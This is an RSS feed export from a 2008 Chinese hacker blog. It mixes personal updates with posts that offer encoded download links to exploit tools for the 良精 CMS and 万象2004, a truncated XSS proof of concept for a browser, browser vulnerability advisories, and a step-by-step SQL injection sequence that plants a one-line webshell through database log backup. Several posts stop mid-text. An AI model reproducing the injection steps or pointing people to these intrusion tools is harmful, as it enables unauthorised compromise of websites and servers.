<![CDATA[天晴軒·無名閣]]> http://popphen.net.ru/ utf-8 F2blog 1.2 build 03.01 天晴軒·無名閣 http://popphen.net.ru/attachments/9872258778.ico http://popphen.net.ru/ 天晴軒·無名閣 http://popphen.net.ru/rewrite.php/read-486.html <![CDATA[暑假了]]> 天晴无名氏 2008-06-30 11:26 http://popphen.net.ru/rewrite.php/read-486.html 博客因为去年暑假至今可以说事一蹶不振
唉 访问量在也没有像去年暑假以前那样突破日ip600了
很是心疼 ..
今天下午2点的车明天早上5点到
无座运气好的话 或许半途有人下车
祝我好运吧
博客已经设置每晚12点以后自动备份
并发送到我的邮箱 因此数据已经确保不会丢失了

可能暑假会更新较慢的 没办法了 ]]> http://popphen.net.ru/rewrite.php/read-485.html <![CDATA[良精企业网站管理系统漏洞利用工具]]> 天晴无名氏 2008-06-30 11:09 http://popphen.net.ru/rewrite.php/read-485.html  
良精企业网站管理系统漏洞利用工具,可以更简单的寻找漏洞,进行入侵。

迅雷地址:
thunder://QUFodHRwOi8vZG93bmxvYWQuNzcxNjkuY29tL3NvZnQvaGFjcmt0b29scy9hdHRhY2svMjAwODA2LzIwMDgwNjMwbGlhbmdqaW5nRVhQdG9vbC56aXBaWg==

快车地址:
flashget://W0ZMQVNIR0VUXWh0dHA6Ly9kb3dubG9hZC43NzE2OS5jb20vc29mdC9oYWNya3Rvb2xzL2F0dGFjay8yMDA4MDYvMjAwODA2MzBsaWFuZ2ppbmdFWFB0b29sLnppcFtGTEFTSEdFVF0=&abc
]]> http://popphen.net.ru/rewrite.php/read-484.html <![CDATA[万象2004终结者]]> 天晴无名氏 2008-06-30 11:06 http://popphen.net.ru/rewrite.php/read-484.html
万象2004终结者是目前最综合的利用万象2004各种漏洞的利用工具。

迅雷地址:
thunder://QUFodHRwOi8vZG93bmxvYWQuNzcxNjkuY29tL3NvZnQvaGFjcmt0b29scy9hdHRhY2svMjAwODA2LzIwMDgwNjMwd3gyMDA0cWdtbGtseS56aXBaWg==

快车地址:
flashget://W0ZMQVNIR0VUXWh0dHA6Ly9kb3dubG9hZC43NzE2OS5jb20vc29mdC9oYWNya3Rvb2xzL2F0dGFjay8yMDA4MDYvMjAwODA2MzB3eDIwMDRxZ21sa2x5LnppcFtGTEFTSEdFVF0=&abc
]]> http://popphen.net.ru/rewrite.php/read-483.html <![CDATA[LiteIM/FreePlus的取IP代码]]> 天晴无名氏 2008-06-30 10:57 http://popphen.net.ru/rewrite.php/read-483.html

随着珊瑚虫被TX镇压后 飘云 虫虫 Freeplus等陆续退出QQ 外挂(辅助工具)的行列 并发出关键代码
随后的QQ显ip去广告等版本都是基于这些出来的 如:功夫QQ2008显ip版 飘云2008贺岁版显ip去广告 腾讯QQ2008 (显IP显隐身) 传美版 腾讯QQ彩虹显IP显隐身包括一些qq显ip显隐身最新版本|qq显ip显隐身最新版本|腾讯qq显ip显隐身下载|最新qq显ip显隐身|qq显ip显隐身版下载|qq显ip显隐身超级版 |腾讯qq显ip显隐身版|qq显ip显隐身补丁|qq显ip显隐身版|传美qq显ip显隐身|腾讯qq显ip显隐身 等等
QQ2008贺岁版显IP显隐身|珊瑚虫|传美|飘云|Fineplus|功夫|狂人|下载

这是LiteIM/FreePlus的取IP代码,感兴趣的朋友看看吧.
runjin的是汇编版本,这是c版本,希望有更多的人能读懂.后来者,愿它对你有益.闪了.
源码:

static const DWORD UnknownSig=0x1E3A86BA;
static const LPSTR szQQUSER_DYNAMIC_DATA="QQUS
]]> http://popphen.net.ru/rewrite.php/read-482.html <![CDATA[WINDOWS SERVER 2003AD域从入门到精通(全集)北大清鸟讲师编精品]]> 天晴无名氏 2008-06-29 21:03 http://popphen.net.ru/rewrite.php/read-482.html WINDOWS SERVER 2003从入门到精通之组策略应用

WINDOWS SERVER 2003从入门到精通之在AD中创建子域和域树

WINDOWS SERVER 2003从入门到精通之使用证书在WEB服务器上设置SSL(上)

WINDOWS SERVER 2003从入门到精通之使用证书在WEB服务器上设置SSL(下)

WINDOWS SERVER 2003从入门到精通之使用IIS服务配置WEB站点

WINDOWS SERVER 2003从入门到精通之配置DHCP服务器(上)

WINDOWS SERVER 2003从入门到精通之配置DHCP服务器(下)

WINDOWS SERVER 2003从入门到精通之林之间的信任关系

WINDOWS SERVER 2003从入门到精通之活动目录数据库的维护

WINDOWS SERVER 2003从入门到精通之创建Windows域

WINDOWS SERVER 2003从入门到精通之NTFS特性

WINDOWS SERVER 2003从入门到精通之DHCP中继代理

WINDOWS SERVER 2003从入门到精通之AD中的5种操作主机



下载文件点此下载.rar (0 Byte , 下载:16次)

]]> http://popphen.net.ru/rewrite.php/read-481.html <![CDATA[世界之窗等浏览器本地xss跨域漏洞POC]]> 天晴无名氏 2008-06-29 00:28 http://popphen.net.ru/rewrite.php/read-481.html

漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html

文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

漏洞分析:世界之窗浏览器在起始页面是以res://E:\\PROGRA~1\\THEWOR~1.0\\languages\\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单分析如下:



<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld[i];
str_name = g_arr_argNameOld[i];

str_td = “<tr ID=’twOldItem” + i +”‘><td v

]]> http://popphen.net.ru/rewrite.php/read-480.html <![CDATA[不知道为什么发生错误 排查中...]]> 天晴无名氏 2008-06-28 02:16 http://popphen.net.ru/rewrite.php/read-480.html 不知道为什么发生错误 排查中...

故障已经找到 没问题了

]]> http://popphen.net.ru/rewrite.php/read-478.html <![CDATA[DBO权限日志备份专用一句话木马]]> 天晴无名氏 2008-06-28 02:04 http://popphen.net.ru/rewrite.php/read-478.html 备分专用一句话

  加个response.end会有不一样的效果,也就是插入一句话后所有的代码都无效,在一句话这里打止,也就减小了webshell的大小.

  日志备分WEBSHELL标准的七步:

  1.InjectionURL’;alter database XXX set RECOVERY FULL-- (把sql设置成日志完全恢复模式)

  2.InjectionURL’;create table cmd (a image)-- (新建立一个cmd表)

  3.InjectionURL’;backup log XXX to disk = ’c:\cmd’ with init-- (减少备分数据的大小)

  4.InjectionURL’;insert into cmd (a) values (’"的16进制字符插入到表中

  4、declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=’C:\Program Files\Co

]]> http://popphen.net.ru/rewrite.php/read-477.html <![CDATA[360安全浏览器本地xss跨域漏洞]]> 天晴无名氏 2008-06-25 12:07 http://popphen.net.ru/rewrite.php/read-477.html

产品官方:360安全浏览器是全球首款采用“沙箱”技术的浏览器,能够彻底避免木马病毒从网页上对你的计算机发起攻击。360安全浏览器完全突破了传统的以查杀、拦截为核心的安全思路,在计算机系统内部构造了一个独立的虚拟空间——“360沙箱”,使所有网页程序都密闭在此空间内运行。因此,网页上任何木马、病毒、恶意程序的攻击都会被限制在“360沙箱”中,无法对真实的计算机系统产生破坏,真正做到百毒不侵。
360安全浏览器只有1.6M,小巧轻快、功能丰富,适合快速安装。除独家采用的“沙箱”技术外,360安全浏览器还集成了恶意代码智能拦截、下载文件即时扫描、恶意网站自动报警,广告窗口智能过滤等强劲功能,是目前市面上最安全的浏览器。

漏洞成因:360在软件被关闭时,如果有未关闭的标签,为了实现用户友好,该标签会在360的起始页面中被显示出来,但是360浏览器在处理用户输入上存在一点问题,导致软件中产生一个跨站脚本漏洞。该跨站脚本漏洞运行的上下文是在res://协议中,也就是在本地域中,所以

]]> http://popphen.net.ru/rewrite.php/read-476.html <![CDATA[第三方浏览器安全警告]]> 天晴无名氏 2008-06-25 12:03 http://popphen.net.ru/rewrite.php/read-476.html

漏洞警告:通过对微软浏览器IE6跨域漏洞的深入研究,我们发现实际上即使在安装了IE7浏览器的操作系统中,也一样存在类似的问题。这个漏洞并不单独存在于IE6中,而是存在于微软提供的浏览器接口中。在微软提供的浏览器内核接口中存在的一个尚未被修补的安全问题,导致所有在IE内核Trident基础上开发的第三方浏览器都存在一个安全漏洞,可能导致跨域的一些操作,在特定的浏览器平台上甚至可以导致远程代码执行。我们建议有高安全性要求的用户暂时还是使用oprea,Firefox等浏览器,避免一些第三方浏览器给您带来损失。

漏洞说明:在和一些技术人员讨论之后可以看到,IE7并没有全新地在内核层次做太多变动,更多的是在IE7本身里Trident内核外围做了一些改动,这导致一些IE7很好的安全特性和修补的安全漏洞并没有遗传给那些使用IE内核的浏览器,因为它们本质上还是使用的系统的IE内核,而不是在外围做了改动的IE7。
一般的浏览器结构都是浏览器外壳+浏览器内核,rident是IE采用的内核心解析引擎,负责处理页面的渲染和javascript的执行。老的IE内核即Trident在几个方面对于第三方浏览器带来的威

]]>